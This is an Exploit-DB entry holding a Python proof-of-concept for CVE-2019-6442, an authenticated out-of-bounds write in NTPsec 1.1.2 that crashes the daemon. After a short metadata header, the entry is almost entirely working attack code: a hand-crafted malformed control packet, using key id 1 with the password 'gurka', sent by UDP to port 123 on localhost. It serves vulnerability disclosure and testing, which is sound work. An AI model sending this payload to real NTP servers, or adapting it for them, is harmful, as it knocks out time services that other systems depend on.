NTPsec 1.1.2 - 'config' (Authenticated) Out-of-Bounds Write Denial of Service (PoC)

EDB-ID:

46178




Platform:

Linux

Date:

2019-01-16


#!/usr/bin/env python
# Exploit Title: ntpsec 1.1.2 authenticated out of bounds write proof of concept DoS
# Bug Discovery: Magnus Klaaborg Stubman (@magnusstubman)
# Exploit Author: Magnus Klaaborg Stubman (@magnusstubman)
# Website: https://dumpco.re/bugs/ntpsec-authed-oobwrite
# Vendor Homepage: https://ntpsec.org/ 
# Software Link: ftp://ftp.ntpsec.org/pub/releases/ntpsec-1.1.2.tar.gz
# Affected versions: all versions of ntpsec including, and prior to 1.1.2.
# CVE: CVE-2019-6442
# Note: this PoC uses Keyid 1 with password ‘gurka’

import sys
import socket

buf = ("\x16\x08\x00\x03\x00\x00\x00\x00\x00\x00\x01\xd4\x6c\x65\x61\x6d" +
       "\x3d\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42" +
       "\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41\x34\x41\x41\x42" +
       "\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x41\x41\x41\x41" +
       "\x41\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41" +
       "\x42\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x42\x42\x42\x42\x42" +
       "\x42\x42\x42\x42\x42\x31\x32\x33\x34\x35\x3e\x37\x38\x39\x30\x31" +
       "\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37" +
       "\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x20\x2d\x36\x33" +
       "\x34\x35\x36\x37\x38\x39\x30\x31\x32\x38\x3d\x20\x2d\x36\x4a\x0a" +
       "\x0a\x0a\x0a\x0a\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a\x0a\x34\x35\x36" +
       "\x37\x38\x39\x0a\x0a\x0a\x26\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a" +
       "\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x09\x0a\x0a\x0a\x0a\x0a\x0a" +
       "\x42\x42\x42\x54\x42\x42\x41\x41\x41\x34\x41\x41\x42\x42\x42\x42" +
       "\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a\x2b\x0a\x0a\x0a\x0a\x41" +
       "\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a" +
       "\x41\x41\x41\x41\x57\x41\x42\x42\x42\x42\x42\x42\x42\x42\x25\x42" +
       "\x42\x41\x41\x41\x0a\xae\x4a\x0a\x0a\x0a\x0a\x0a\x64\x0a\x0a\x08" +
       "\x0a\x2b\x0a\x0a\x0a\x34\x35\x36\x37\x38\x39\x0a\x0a\x0a\x26\x0a" +
       "\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a" +
       "\x0a\x09\x0a\x0a\x0a\x0a\x0a\x0a\x42\x42\x42\x54\x42\x42\x41\x41" +
       "\x41\x34\x41\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41" +
       "\x41\x0a\x2b\x0a\x0a\x0a\x0a\x41\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a" +
       "\x64\x0a\x0a\x0a\x0a\x2b\x0a\x0a\x41\x41\x41\x41\x57\x41\x42\x42" +
       "\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a\x0a\x42\x42\x42" +
       "\x41\x41\x41\x0a\x2b\x0a\x0a\x0a\x0a\x0a\x0a\x64\x41\x41\x41\x43" +
       "\x57\x41\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x41\x41\x41\x0a" +
       "\x0a\x0a\x05\xff\xff\x05\x0a\x64\x1b\x0a\x0a\x0a\x2b\x0a\x0a\x0a" +
       "\x0a\x0a\x41\x41\x41\x41\x41\x41\x41\x41\x41\x33\x34\x00\x00\x00" +
       "\x80\x39\x30\x20\x32\x33\x34\x35\x36\x37\x38\x39\x30\x41\x5b\x41" +
       "\x00\x00\x00\x01\x8f\x2c\x6e\x5b\x49\xe7\xa0\x78\xa1\x9b\x50\xf5" +
       "\xb2\x18\x04\x00")

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))